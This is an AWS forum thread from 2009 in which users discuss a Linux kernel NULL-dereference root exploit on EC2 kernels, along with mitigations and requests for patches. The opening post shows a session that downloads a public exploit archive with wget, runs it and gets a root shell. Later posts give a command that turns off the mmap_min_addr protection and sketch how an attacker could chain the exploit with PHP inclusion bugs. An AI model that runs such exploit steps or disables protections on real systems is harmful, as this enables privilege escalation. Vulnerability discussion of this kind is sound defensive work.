|
Discussion Forums
|
Thread: Kernel vulnerability affects EC2: NULL Pointer Dereference
 |
This question is answered.
|
|
|
|
Replies:
60
-
Pages:
5
[
1
2
3
4
5
| Next
]
-
Last Post:
Nov 6, 2009 1:52 PM
by: Eric Hammond
|
|
|
Posts:
23
Registered:
2/10/09
|
|
|
|
Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 6:15 AM PDT
|
|
|
Hi. Last week a vulnerability was found in the Linux kernel that basically grants you root access to a machine if you have a normal user account. I've tested this in one instance running kernel 2.6.18-xenU-ec2-v1.0.
Example:
myuser@host /tmp $ uname -r
2.6.18-xenU-ec2-v1.0
myuser@host /tmp $ wget http://www.securityfocus.com/data/vulnerabilities/exploits/36038-4.tgz
(...)
myuser@host /tmp $ tar zxvf 36038-4.tgz
exploit.c
run.c
run.sh
myuser@host /tmp $ whoami
myuser
myuser@host /tmp $ sh run.sh
padlina z lublina!
sh-3.2# whoami
root
sh-3.2#
|
Of course the attacker would have to first login to the machine with SSH, so it's bad but could be worse.
As we cannot have our custom kernels, we have to wait till Amazon releases a new kernel that fixes this. Does anyone know when will this happen?
Thank you.
|
|
Posts:
23
Registered:
2/10/09
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 6:28 AM PDT
in response to: ObRelman
|
|
|
did any one found any quick fix for this ??
|
|
Posts:
1,134
Registered:
7/7/07
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 6:40 PM PDT
in response to: ObRelman
|
|
|
I have confirmed that this vulnerability also exists in aki-a71cf9ce, the current 2.6.21.7-2.fc8xen (32-bit) kernel from Amazon.
|
|
Posts:
48
Registered:
12/15/07
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 9:59 PM PDT
in response to: Eric Hammond
|
|
|
Tested using: Canonical Ubuntu 8.10 Intrepidami-5059be39
ubuntu@domU-12-31-39-00-DD-13:~$ uname -r
2.6.27-23-xen
ubuntu@domU-12-31-39-00-DD-13:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 8.10
Release: 8.10
Codename: intrepid
ubuntu@domU-12-31-39-00-DD-13:~$ sh run.sh
run.c: In function ‘main’:
run.c:13: warning: missing sentinel in function call
padlina z lublina!
mprotect: Cannot allocate memory
ubuntu@domU-12-31-39-00-DD-13:~$
This is fixed on Canonical kernel. AWS folks, any comments or fix on this?
Rodney
|
|
Posts:
5
Registered:
8/20/09
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 10:31 PM PDT
in response to: ObRelman
|
|
|
The attacker doesn't need SSH access, he needs any type of access that would let him download and execute the script.
A pretty bad scenario would be:
You have an insecure script (could be an open-source application, where it's usually easier to find vulnerabilities).
For example, it could be a PHP application, there tons of scripts out there that still require register_globals and regardless, many applications have remote inclusion vulnerabilities.
That should be enough to have to grant PHP access which means there's a high chance that the attacker could execute whatever he/she wants.
Sounds easy, doesn't it?
Well, it doesn't only sound easy, it -is- easy...
Edit:
It's sad (and a little funny( how run.sh even compiles everything for you...
|
|
Posts:
23
Registered:
2/10/09
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 10:46 PM PDT
in response to: samitny
|
|
|
@samitny
but at the minimum you require gcc to be installed for compiling run.c :)
|
|
Posts:
23
Registered:
2/10/09
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 11:39 PM PDT
in response to: ObRelman
|
|
|
In theory there is a workaround many people is using that consists on setting mmap_min_addr to a non-null value. For example:
echo 4096 > /proc/sys/vm/mmap_min_addr
|
However this key is not available in the 2.6.18-xenU-ec2-v1.0 kernel.
|
|
Posts:
5
Registered:
8/20/09
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 20, 2009 11:44 PM PDT
in response to: ObRelman
|
|
|
@ObRelman
Or you can compile it on a different machine, upload, chmod and execute...
There's a solution for everything :-)
|
|
Posts:
1,134
Registered:
7/7/07
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 1:20 AM PDT
in response to: Rodney Quillo
|
|
|
Tested using: Canonical Ubuntu 8.10 Intrepidami-5059be39
[...]
ubuntu@domU-12-31-39-00-DD-13:~$ sh run.sh
[...]
mprotect: Cannot allocate memory
This is fixed on Canonical kernel.
That Canonical kernel was built back in April, so it doesn't seem likely it would have deliberately fixed a security hole which was just publicized. Are you saying that you know this particular kernel is not vulnerable to the underlying flaw? Or just that this particular exploit program doesn't happen to work on it?
|
|
Posts:
23
Registered:
2/10/09
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 1:32 AM PDT
in response to: Eric Hammond
|
|
|
Ubuntu enabled the mmap_min.addr protection just in case a exploit appeared in the future. So the kernel is vulnerable.
Having a look at a Ubuntu 8.04 /etc/sysctl.conf
# protect bottom 64k of memory from mmap to prevent NULL-dereference
# attacks against potential future kernel security vulnerabilities.
# (Added in kernel 2.6.23.)
vm.mmap_min_addr = 65536
|
@rodneyq
If you want to test it, try doing a "echo 0 > /proc/sys/vm/mmap_min_addr" and rerunning the exploit.
|
|
Posts:
1,134
Registered:
7/7/07
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 4:55 AM PDT
in response to: ObRelman
|
|
|
ObRelman:
Thanks for the clarification.
Unfortunately, the vm.mmap_min_addr workaround protection does not seem to be available on the 2.6.21 kernel.
|
|
Posts:
48
Registered:
12/15/07
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 1:50 PM PDT
in response to: Eric Hammond
|
|
|
Hi Eric,
I just test it out of curiosity. And this this program doesnt' happen to work on this kernel. :)
Rodney
|
|
Posts:
48
Registered:
12/15/07
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 1:52 PM PDT
in response to: ObRelman
|
|
|
ObRelman
:
>If you want to test it, try doing a "echo 0 > /proc/sys/vm/mmap_min_addr" and >rerunning the exploit.
Trying it again using this.
|
|
Posts:
1,134
Registered:
7/7/07
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 21, 2009 3:45 PM PDT
in response to: Rodney Quillo
|
|
|
rodneyq:
After testing with the input from ObRelman, I verified that the Canonical kernel does have the vulnerability, but that particular exploit program does not work with that kernel if mmap_min_addr is set to above zero. All of the Ubuntu images seem to default to mmap_min_addr above zero, so they are safe from this particular exploit.
It still isn't clear to me if there might be other exploits for the kernel vulnerability, but in any case, I strongly support new kernels all around from Amazon and Canonical fixing this vulnerability.
We know historically that kernels need to have security patches; there needs to be a clear process and strong policy for this to happen on EC2.
This is a big security issue for folks who have multi-user systems running on EC2, but just think of the impact if the next published kernel vulnerability has an easy exploit over the network and nobody on EC2 can protect themselves.
|
|
Posts:
14
Registered:
8/27/06
|
|
|
|
Re: Kernel vulnerability affects EC2: NULL Pointer Dereference
Posted:
Aug 22, 2009 4:42 AM PDT
in response to: ObRelman
|
|
|
Come on Amazon - what's your response here ? I think Amazon needs to respond to this issue, either by releasing updated AMIs or by stating their policy on this problem.
|
|
|
|
Sign in to the AWS Management Console
Create an AWS Account
